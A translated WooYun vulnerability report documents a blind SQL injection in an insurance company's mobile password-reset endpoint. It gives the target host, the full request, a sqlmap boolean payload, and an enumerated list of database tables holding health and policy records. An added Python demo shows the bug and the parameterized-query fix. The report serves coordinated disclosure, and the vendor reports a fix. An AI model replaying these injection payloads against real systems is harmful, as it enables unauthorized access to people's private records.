
Vulnerability summary

Defect ID: wooyun-2015-0158847

Title: Oracle SQL injection vulnerability in a Jixiang Life (吉祥人寿) system

Affected vendor: 吉祥人寿保险股份有限公司 (Jixiang Life Insurance Co., Ltd.)

Author: 无名人

Submitted: 2015-12-06 17:12

Fixed: 2016-01-19 09:45

Published: 2016-01-19 09:45

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-06: Details reported to the vendor; awaiting vendor response
2015-12-07: Vendor confirmed; details visible to the vendor only
2015-12-17: Details disclosed to core white hats and domain experts
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-19: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

See title.

Details:

Affected system: http://mobile.jxlife.com.cn/
Vulnerable request:

POST /servlet/process.action HTTP/1.1
Host: mobile.jxlife.com.cn
Proxy-Connection: keep-alive
Content-Length: 123
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.5.0
Origin: http://mobile.jxlife.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mobile.jxlife.com.cn/sys/getUserPsw.jsp?type=forgetPsw
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=00009c2jYA5WXYrGQqaeWo_fOuO:-1
beanId=UserPswAction&operation=reSetPsw&userCode=admin*&type=forgetPsw&userName=%E6%A8%A1%E5%8E%8B&IDNo=&mobileNo=&eMail=&_=


The userCode parameter is vulnerable to boolean-based blind SQL injection (sqlmap output):

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: beanId=UserPswAction&operation=reSetPsw&userCode=admin') AND 2131=2131 AND ('xgpO'='xgpO&type=forgetPsw&userName=%E4%BA%8B%E4%B8%8E%E6%84%BF%E8%BF%9D&IDNo=&mobileNo=&eMail=&_=
---
[12:29:17] [INFO] testing MySQL
[12:29:17] [WARNING] the back-end DBMS is not MySQL
[12:29:17] [INFO] testing Oracle
[12:29:17] [INFO] confirming Oracle
[12:29:17] [INFO] the back-end DBMS is Oracle
web application technology: Apache
back-end DBMS: Oracle
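The payload above closes the open quote and parenthesis of the original predicate and appends a condition that is either true (2131=2131) or false, so the application's "user exists / does not exist" response leaks one bit per request. The following is an added example, not code from the report or from the affected application, that reproduces the query shape the payload implies and shows why bind parameters stop it. It assumes a WHERE clause of the form `(USERCODE = '...') AND (USERNAME = '...')` over the LSUSER table listed in the report; the column names and rows are constructed, and sqlite3 stands in for Oracle so it runs offline (single-quoted string literals follow the same quoting rules in both).

```python
import sqlite3

# Constructed stand-in schema: the report lists an LSUSER table but no columns,
# so USERCODE and USERNAME are assumptions made for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE LSUSER (USERCODE TEXT, USERNAME TEXT)")
    conn.executemany(
        "INSERT INTO LSUSER VALUES (?, ?)",
        [("admin", "模压"), ("agent01", "张三")],  # constructed rows
    )
    return conn


# Vulnerable pattern: request parameters concatenated into the WHERE clause.
# A quote and a parenthesis in user_code terminate the intended predicate and
# the rest of the value is parsed as SQL.
def lookup_vulnerable(conn, user_code, user_name):
    sql = (
        "SELECT USERCODE FROM LSUSER WHERE (USERCODE = '" + user_code
        + "') AND (USERNAME = '" + user_name + "')"
    )
    return [row[0] for row in conn.execute(sql)]


# Hardened pattern: the same query with bind parameters. The DBMS receives the
# SQL text and the values separately, so quotes and parentheses inside a value
# are compared as data and never change the statement's structure.
def lookup_parameterized(conn, user_code, user_name):
    sql = "SELECT USERCODE FROM LSUSER WHERE (USERCODE = ?) AND (USERNAME = ?)"
    return [row[0] for row in conn.execute(sql, (user_code, user_name))]


# The boolean-blind payload from the report (URL-decoded) and a false-condition
# twin; the difference in responses is what an attacker reads one bit at a time.
TRUE_PAYLOAD = "admin') AND 2131=2131 AND ('xgpO'='xgpO"
FALSE_PAYLOAD = "admin') AND 2131=2132 AND ('xgpO'='xgpO"


def demo():
    conn = make_db()
    name = "模压"  # the userName value sent in the captured request
    return {
        "legit": lookup_vulnerable(conn, "admin", name),
        "vuln_true": lookup_vulnerable(conn, TRUE_PAYLOAD, name),
        "vuln_false": lookup_vulnerable(conn, FALSE_PAYLOAD, name),
        "param_true": lookup_parameterized(conn, TRUE_PAYLOAD, name),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:11s} -> {rows}")
```

Under the vulnerable function the true-condition payload returns the admin row exactly like a legitimate lookup while the false-condition payload returns nothing, which is the observable difference sqlmap exploited. Under the parameterized function the whole payload is compared against USERCODE as a literal string and matches no row, and the same holds for every other value the parameter can carry. On a Java stack such as the servlet here, the equivalent fix is `PreparedStatement` with `setString` instead of string concatenation; a network-level filter on the `AND ... =` pattern is at best a stopgap, since the fault is the query construction.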

Proof of vulnerability:

Database:

[Screenshot: 数据库.png (database name)]


Quite a lot of data:

Database: YDZY
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| FORMLSHEALTH | 2341224 |
| OPERATORHISTORY | 570949 |
| LSPOL | 242818 |
| LDSYSREQUESTLOG | 219201 |
| LDSYSLOG | 200223 |
| LDSYSIMAGES | 185005 |
| LSCONT | 160176 |
| LSSUGGESTPUBELEMENT | 157769 |
| SUGTOEFORM | 157193 |
| LSLATNCYCUSTMTRANS | 143403 |
| LSSUGGESTPRIELEMENT | 128451 |
| FORMLSPICINFO | 125319 |
| LSAPPNT | 123111 |
| LSINSURED | 121650 |
| CV_1303 | 114264 |
| CV_112201 | 85864 |
| DIV_112201 | 85864 |
| DIV_212204 | 85864 |
| LSREMIND | 80497 |
| FORMLSPOL | 74332 |
| LSLATNCYCUSTM | 58144 |
| CV_5003 | 52594 |
| DIV_5003 | 51960 |
| FNAPDFHIS | 46894 |
| CV_111201 | 42276 |
| DIV_111201 | 42276 |
| SAVAINSUANDAPPFLAG | 39024 |
| LSUSERDEVICE | 38592 |
| CV_111203 | 37216 |
| DIV_111203 | 37216 |
| CV_113201 | 35448 |
| CV_128101 | 35448 |
| DIV_113201 | 35448 |
| CV_118102 | 33378 |
| CV_218101 | 33378 |
| LSMESSAGEHISTORY | 33323 |
| FORMLSCONT | 32430 |
| FORMLSREPAY | 32430 |
| FORMLSAPPNT | 32429 |
| FORMLSINSURED | 32428 |
| FORMSTATE | 31894 |
| CV_124101 | 28444 |
| CV_128103 | 28444 |
| CV_124103 | 26790 |
| CV_128105 | 26790 |
| CV_212205 | 26670 |
| CV_228101 | 26670 |
| DIV_212205 | 26670 |
| FORMLSPAYINFO | 25545 |
| LAQUALIFICATION | 20276 |
| CV_211101 | 17914 |
| CV_212204 | 17054 |
| LSUSER | 13818 |
| CV_211102 | 11920 |
| LSUSERPSWHISTORY | 10723 |
| CV_111202 | 10200 |
| CV_611201 | 10200 |
| DIV_111202 | 10200 |
| DIV_611201 | 10200 |
| LDCODE | 7891 |
| CV_112202 | 7360 |
| CV_128102 | 7360 |
| DIV_112202 | 7360 |
| LSACTIVITYWARNINGRECORD | 7282 |
| LDMAXNO | 7182 |
| CV_129102 | 6600 |
| CV_129104 | 6600 |
| CV_629101 | 6600 |
| LSCANDIDATEINFO | 6260 |
| HOSPITALPOSITION | 6010 |
| LSCOM | 5984 |
| LSUSERTRANS | 5871 |
| USERCODETRANS | 5227 |
| INVESTRISKDATA | 4866 |
| FORMLSBENEFI | 4597 |
| CV_212203 | 3770 |
| DIV_212203 | 3770 |
| CV_124102 | 3588 |
| CV_112203 | 2710 |
| CV_128104 | 2710 |
| DIV_112203 | 2710 |
| LSRENEWALVISIT | 2524 |
| LSRENEWALVISITPOL | 2524 |
| FNAANSWER | 2222 |
| CV_2007 | 2160 |
| LDOCCUPATION | 2011 |
| CV_2002 | 1488 |
| LSUSERTEAM | 1256 |
| RATE_212205 | 1144 |
| RATE_228101 | 1144 |
| FORMLSPRTID | 1095 |
| RATE_112201 | 1082 |
| CALCUTEELEMET | 1017 |
| T_CUSTOMER | 1000 |
| PROCEEDSEXPRESS | 966 |
| RATE_124103 | 948 |
| RATE_128105 | 948 |
| CV_1104 | 912 |
| RATE_2005 | 746 |
| RATE_EFG | 746 |
| RATE_1303 | 714 |
| FORMLSREPAYMAIN | 696 |
| FORMLSHEALTHEXP | 672 |
| LSACTIVITY | 647 |
| RATE_5003 | 634 |
| DIV_2007 | 560 |
| LSLATNCYCUSTMFAMILY | 559 |
| RATE_211102 | 534 |
| GP_111201 | 532 |
| RATE_111201 | 532 |
| RATE_124101 | 532 |
| RATE_128103 | 532 |
| RATE_111203 | 492 |
| RATE_113201 | 458 |
| RATE_128101 | 458 |
| LSITEMDATALINK | 422 |
| LSDATAITEM | 421 |
| RATE_118102 | 418 |
| RATE_218101 | 418 |
| RATE_111202 | 408 |
| RATE_118201 | 408 |
| RATE_611201 | 408 |
| COMMISSIONPLUSSEQUESTRATE | 396 |
| FNAFIMAILYRELATIONS | 380 |
| RATE_124102 | 380 |
| COMMISSIONDETAIL | 352 |
| RATE_211101 | 348 |
| LMCALMODE | 332 |
| RATE_129102 | 264 |
| RATE_129104 | 264 |
| RATE_629101 | 264 |
| RATE_212203 | 258 |
| FNACUSTOMDATA | 244 |
| RISKPLANANDRISKSALECONF | 236 |
| LMCHECKFIELD | 234 |
| LSRPTRANSRECORD | 229 |
| LSRENEWALPAY | 217 |
| RATE_212204 | 214 |
| RISKRATE_122301 | 212 |
| RISKRATE_123301 | 212 |
| RISKRATE_222302 | 212 |
| LDSYSVAR | 195 |
| LSMODELLINK | 187 |
| FEETENCENT | 183 |
| LMRISKSCREEN | 179 |
| CV_1106 | 178 |
| DIV_1106 | 178 |
| LDCOMGRPTOCOM | 172 |
| POLDETAILCARE | 158 |
| FNAZ | 152 |
| STATICMSGURL | 142 |
| LMRISKPARAM | 135 |
| LSCLAIMINFO | 129 |
| RATE_112202 | 128 |
| RATE_128102 | 128 |
| UPLOADPICFILE | 125 |
| RATE_112203 | 118 |
| RATE_128104 | 118 |
| FNASINGLE | 116 |
| RATE_2007 | 114 |
| FNAINSURANCEDATA | 113 |
| AVLSP_PL | 106 |
| LDSYSIMAGECHEKDETAIL | 99 |
| FNAFEEDATA | 98 |
| LMRISKROLE | 98 |
| FORMLSHEALTHSUBJECT | 96 |
| YIBEIFEIYONG | 95 |
| RATE_2002 | 92 |
| FNAINCOMEDATA | 89 |
| GERENBAOXIAOSHOUXIAN | 88 |
| POLDETAILFIRSTYEAR | 88 |
| YINGBEITABLE | 88 |
| RISKPLAN | 85 |
| LSGOLDPSW | 84 |
| REMINDREAD | 84 |
| LSAGENTMENUGRPTOMENU | 83 |
| LSTAXES | 78 |
| LSLATNCYCUSTMINTRODUCE | 77 |
| LMRISKSCREENVALIDATE | 74 |
| POLDETAILCONTINUE | 74 |
| QITASHOURU | 73 |
| RATE_1104 | 72 |
| QITAFEIYONG | 71 |
| FNACHILDREN | 70 |
| LSAGENTMENU | 70 |
| TB_222301 | 62 |
| TB_222302 | 62 |
| FNAINVESTARGDATA | 60 |
| LSCOMTRANS | 56 |
| LSCOMPARAM | 55 |
| LSLATNCYCUSTMIMPDATE | 55 |
| FNAINVESTDATA | 54 |
| FORMLSHEALTHVERCOD | 51 |
| ZICHAN | 51 |
| LMDUTY | 50 |
| LMDUTYGET | 49 |
| LMDUTYGETRELA | 49 |
| LMDUTYPAY | 49 |
| LMDUTYPAYRELA | 49 |
| LMRISKDUTY | 49 |
| FNAMANY | 48 |
| ZHANRISK | 47 |
| LMRISK | 45 |
| DEVELOPMENTACTIVITY | 44 |
| KHZL | 44 |
| LMRISKRELA | 43 |
| LSPLANCODE | 42 |
| LMRISKAPP | 40 |
| LMRISKCOMCTRL | 40 |
| FNALOANDATA | 39 |
| QITADAIKUAN | 38 |
| LSRISKITEM | 37 |
| PACKAGEMANAGE | 36 |
| LSITEM | 35 |
| JIAOYUFEIYONG | 34 |
| LSPAYPERMONTH | 34 |
| FNAPARA | 31 |
| FNAMAIN | 30 |
| TB_122301 | 30 |
| FNASYSPARAM | 29 |
| FNAOTHTAGPAYDATA | 26 |
| LDSYSIMAGECHECK | 26 |
| LSSEQUENCEACTIVITY | 26 |
| LSAPPEDPOL | 24 |
| FNARETPAYDATA | 22 |
| JIAOYUFEIYONGFJ | 22 |
| LSCOMSTATUSTRACE | 21 |
| RATE_1106 | 18 |
| LSAGENTMENUGRP | 14 |
| LSUSERUNREALGROUPMEMBER | 14 |
| AUTHORIZDBANKINFO | 12 |
| LSHEALTHINFORM | 12 |
| LSSECONDOPRATOR | 12 |
| LSUSERPARAMS | 12 |
| LSWORDMSG | 12 |
| LSUSERUNREALGROUP | 10 |
| TB_212302 | 10 |
| XIALACAIDAN | 9 |
| LSKNOWLEDGEBASEITEM | 8 |
| LSNOTICE | 7 |
| LDCOMGRP | 6 |
| RATE_128204 | 6 |
| RATE_128205 | 6 |
| RATE_129101 | 6 |
| LMRISKSALEGROUPTORISK | 5 |
| LSACTIVITYDONEHISTORY | 4 |
| NOTICE | 4 |
| LSBENIFIT | 3 |
| POLSHORTCONTINUE | 3 |
| LMRISKSALEGROUP | 2 |
| LSMODEL | 2 |
| LSPRTANDEFORMNO | 2 |
| LSPHOTO | 1 |
| PUSHHISTORY | 1 |
+---------------------------+---------+


I see your earlier holes all got low ranks; could this injection get a Rank of 10?

Remediation:

@@

Copyright notice: please credit the source when reposting: 无名人@乌云


Responses

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-12-07 14:43

Vendor reply:

This is an internal business system; thank you for your attention!
We will verify and fix it.

Latest status:

2016-01-18: Fixed

2016-01-19: Vulnerability fixed